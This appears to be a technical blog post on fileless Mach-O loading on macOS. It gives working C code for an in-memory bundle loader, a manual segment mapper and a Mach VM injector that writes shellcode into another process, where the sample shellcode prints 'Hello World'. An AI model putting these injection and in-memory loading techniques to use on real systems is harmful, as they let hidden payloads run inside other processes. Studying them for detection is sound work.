In-Memory Mach-O Execution on macOS

In-memory execution on macOS yes, it’s a thing. Sometime ago, I read a post by Patrick Wardle about one of the Lazarus Group implants using remote downloads and in-memory execution. I decided to revisit this technique.

In-memory execution means running executable code directly in memory without writing a physical file to disk. The trick is in dynamic loading. A process image in memory and its image on disk are different things you can’t just copy a file into memory and jump to it. Instead, you use APIs like NSCreateObjectFileImageFromMemory and NSLinkModule to handle the in-memory mapping and linking. These have been deprecated since macOS Catalina, but they still work on older systems.

I found this example which loads a binary or bundle into a region of memory.

But first, we need to know what a Mach-O file actually is.

Mach-O Format

Mach-O is the standard binary format for executables, object code, shared libraries, and core dumps on macOS and iOS. There are several types:

Executable - code and data for running a program
Dynamic Library (.dylib) - shared code usable by multiple programs
Bundle (.bundle) - code that can be loaded dynamically at runtime

The format consists of headers, load commands, and segments. Each segment may contain executable code, initialized data, and metadata. The dynamic linker dyld uses this metadata to map the file into memory, resolve symbols, and execute it. The two main segments are __TEXT (executable code) and __DATA (global variables).

~$ otool -hV /Applications/Signal.app/Contents/MacOS/Signal
Mach header
      magic  cputype cpusubtype  caps    filetype ncmds sizeofcmds      flags
MH_MAGIC_64   X86_64        ALL LIB64     EXECUTE    16       1544   NOUNDEFS DYLDLINK TWOLEVEL PIE

~$ otool -l /Applications/Signal.app/Contents/MacOS/Signal
Load command 0
      cmd LC_SEGMENT_64
  cmdsize 72
  segname __PAGEZERO
   vmaddr 0x0000000000000000
   vmsize 0x0000000100000000
  fileoff 0
 filesize 0
  maxprot 0x00000000
 initprot 0x00000000
   nsects 0
    flags 0x0
...

The bundle format is the most relevant here. A bundle is a dynamic library that can be loaded at runtime. When dyld processes the Mach-O headers and load commands, it maps the file sections into memory, sets proper permissions (READ, EXECUTE, READ/WRITE), and resolves all required symbols before passing control to the entry point.

For in-memory execution without touching disk, we have to do what dyld does ourselves: map segments into memory, set permissions, resolve symbols. That’s the whole game.

Mach-O Format Reference

Deprecated API Approach

The old way using NSCreateObjectFileImageFromMemory and NSLinkModule. Deprecated since Catalina but worth understanding:

#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <mach-o/dyld.h>

int main() {
    struct stat sb; void *code = NULL;
    NSObjectFileImage img = NULL; NSModule mdl = NULL; NSSymbol sym = NULL;
    void (*exec_fn)() = NULL;

    int fd = open("test.bundle", O_RDONLY);
    if (fd < 0 || fstat(fd, &sb) < 0) return 1;

    code = mmap(NULL, sb.st_size, PROT_READ, MAP_PRIVATE, fd, 0); close(fd);
    if (code == MAP_FAILED) return 1;

    if (NSCreateObjectFileImageFromMemory(code, sb.st_size, &img) != NSObjectFileImageSuccess)
        return munmap(code, sb.st_size), 1;

    mdl = NSLinkModule(img, "module", NSLINKMODULE_OPTION_NONE);
    if (!mdl) return NSDestroyObjectFileImage(img), munmap(code, sb.st_size), 1;

    sym = NSLookupSymbolInModule(mdl, "_execute");
    if (!sym) return NSUnLinkModule(mdl, NSUNLINKMODULE_OPTION_NONE),
                  NSDestroyObjectFileImage(img), munmap(code, sb.st_size), 1;

    if ((exec_fn = NSAddressOfSymbol(sym))) exec_fn();

    NSUnLinkModule(mdl, NSUNLINKMODULE_OPTION_NONE);
    NSDestroyObjectFileImage(img);
    return munmap(code, sb.st_size), 0;
}

We emulate what dyld does: map the file into memory, create an object file image, link the module, resolve the _execute symbol, and call it. No disk writes.

Since 10.15, Apple pushed everyone to dlopen/dlsym/dlclose for dynamic loading. But dlopen expects a file on disk. For purely in-memory execution, we need to manually parse Mach-O headers and set up memory regions with mmap, doing dyld’s job ourselves.

Manual Mach-O Loading

No deprecated APIs. We parse the Mach-O headers, map segments, resolve symbols from the symbol table, and call the target function:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <mach-o/loader.h>
#include <mach-o/nlist.h>

void load_macho(const char *path) {
    int fd = open(path, O_RDONLY); if (fd < 0) return;
    struct stat sb; if (fstat(fd, &sb) < 0) { close(fd); return; }
    void *codeAddr = mmap(NULL, sb.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0); close(fd);
    if (codeAddr == MAP_FAILED) return;

    struct mach_header_64 *header = (struct mach_header_64 *)codeAddr;
    if (header->magic != MH_MAGIC_64) return munmap(codeAddr, sb.st_size), (void)0;

    struct load_command *loadCmd = (struct load_command *)(header + 1);
    for (uint32_t i = 0; i < header->ncmds; i++) {
        if (loadCmd->cmd == LC_SEGMENT_64) {
            struct segment_command_64 *segCmd = (struct segment_command_64 *)loadCmd;
            void *segAddr = mmap((void *)segCmd->vmaddr, segCmd->vmsize,
                PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
            if (segAddr == MAP_FAILED) { munmap(codeAddr, sb.st_size); return; }
            memcpy(segAddr, codeAddr + segCmd->fileoff, segCmd->filesize);
        }
        loadCmd = (struct load_command *)((char *)loadCmd + loadCmd->cmdsize);
    }

    struct symtab_command *symTabCmd = NULL;
    loadCmd = (struct load_command *)(header + 1);
    for (uint32_t i = 0; i < header->ncmds; i++) {
        if (loadCmd->cmd == LC_SYMTAB) { symTabCmd = (struct symtab_command *)loadCmd; break; }
        loadCmd = (struct load_command *)((char *)loadCmd + loadCmd->cmdsize);
    }

    if (symTabCmd) {
        struct nlist_64 *symTbl = (struct nlist_64 *)(codeAddr + symTabCmd->symoff);
        char *strTbl = (char *)(codeAddr + symTabCmd->stroff);
        for (uint32_t i = 0; i < symTabCmd->nsyms; i++) {
            if (strcmp(strTbl + symTbl[i].n_un.n_strx, "_execute") == 0) {
                ((void (*)())(symTbl[i].n_value))();
            }
        }
    }
    munmap(codeAddr, sb.st_size);
}

int main() { load_macho("test.bundle"); return 0; }

Open the file, check the magic, iterate through load commands to map all LC_SEGMENT_64 segments into executable memory, then walk the symbol table looking for _execute and call it. Everything dyld does, done manually.

Mach VM Injection

Taking it further inject shellcode into another process using the Mach VM API. task_for_pid to get the target’s task port, mach_vm_allocate for memory, mach_vm_write to drop the shellcode, mach_vm_protect to make it executable, thread_create_running to kick it off:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>

#define SHELLCODE_SIZE 128
#define STACK_SIZE     (SHELLCODE_SIZE * 4)

unsigned char shellcode[] = {
    0x90, 0x90, 0x90,
    0x90, 0xeb, 0x1e,
    0x5e,
    0xb8, 0x04, 0x00, 0x00, 0x02,
    0xbf, 0x01, 0x00, 0x00, 0x00,
    0xba, 0x0e, 0x00, 0x00, 0x00,
    0x0f, 0x05,
    0xb8, 0x01, 0x00, 0x00, 0x02,
    0xbf, 0x00, 0x00, 0x00, 0x00,
    0x0f, 0x05,
    0xe8, 0xdd, 0xff, 0xff, 0xff,
    0x48, 0x65, 0x6c, 0x6c, 0x6f, 0x20, 0x57, 0x6f,
    0x72, 0x6c, 0x64, 0x21, 0x0d, 0x0a
};

void allocate_stuff(task_t task, mach_vm_address_t *shellcode_addr, mach_vm_address_t *stack_addr) {
    mach_vm_allocate(task, shellcode_addr, SHELLCODE_SIZE, VM_FLAGS_ANYWHERE);
    mach_vm_write(task, *shellcode_addr, (vm_offset_t)shellcode, SHELLCODE_SIZE);
    mach_vm_protect(task, *shellcode_addr, SHELLCODE_SIZE, FALSE, VM_PROT_READ | VM_PROT_EXECUTE);
    mach_vm_allocate(task, stack_addr, STACK_SIZE, VM_FLAGS_ANYWHERE);
}

void do_the_injection(pid_t pid) {
    task_t task;
    mach_vm_address_t shellcode_addr = 0, stack_addr = 0;
    task_for_pid(mach_task_self(), pid, &task);

    allocate_stuff(task, &shellcode_addr, &stack_addr);

    x86_thread_state64_t state = {0};
    state.__rip = (uint64_t)shellcode_addr;
    state.__rsp = stack_addr + STACK_SIZE;

    thread_act_t thread;
    thread_create_running(task, x86_THREAD_STATE64,
        (thread_state_t)&state, x86_THREAD_STATE64_COUNT, &thread);
    printf("[+] Injected into %d\n", pid);
}

int main(int argc, char *argv[]) {
    if (argc < 2) { printf("Usage: %s <PID>\n", argv[0]); return -1; }
    do_the_injection(atoi(argv[1]));
    return 0;
}

r 5294
Process 5301 launched: '/Users/i/src/exec' (x86_64)
[+] Injected into 5294
Process 5301 exited with status = 0 (0x00000000)

Hello World!
[1]  + 5294 done

lldb debugging the injection

The memory map tells the story. The __TEXT segment has r-x permissions (readable, executable, not writable). The dyld private memory area shows rwx memory was mapped writable then made executable, exactly what happens when using mmap for shellcode execution. The mprotect call changes permissions from PROT_READ | PROT_WRITE to PROT_READ | PROT_EXEC, and the shellcode runs from that region.

This uses task_for_pid(), mach_vm_allocate(), and mach_vm_write(), which macOS restricts to processes with admin rights under SIP. Regular users don’t get unrestricted access to core functionality. That’s by design.

Patrick Wardle - In-Memory Execution · Adam Chester - dyld Patching · HackTricks - macOS SIP Bypass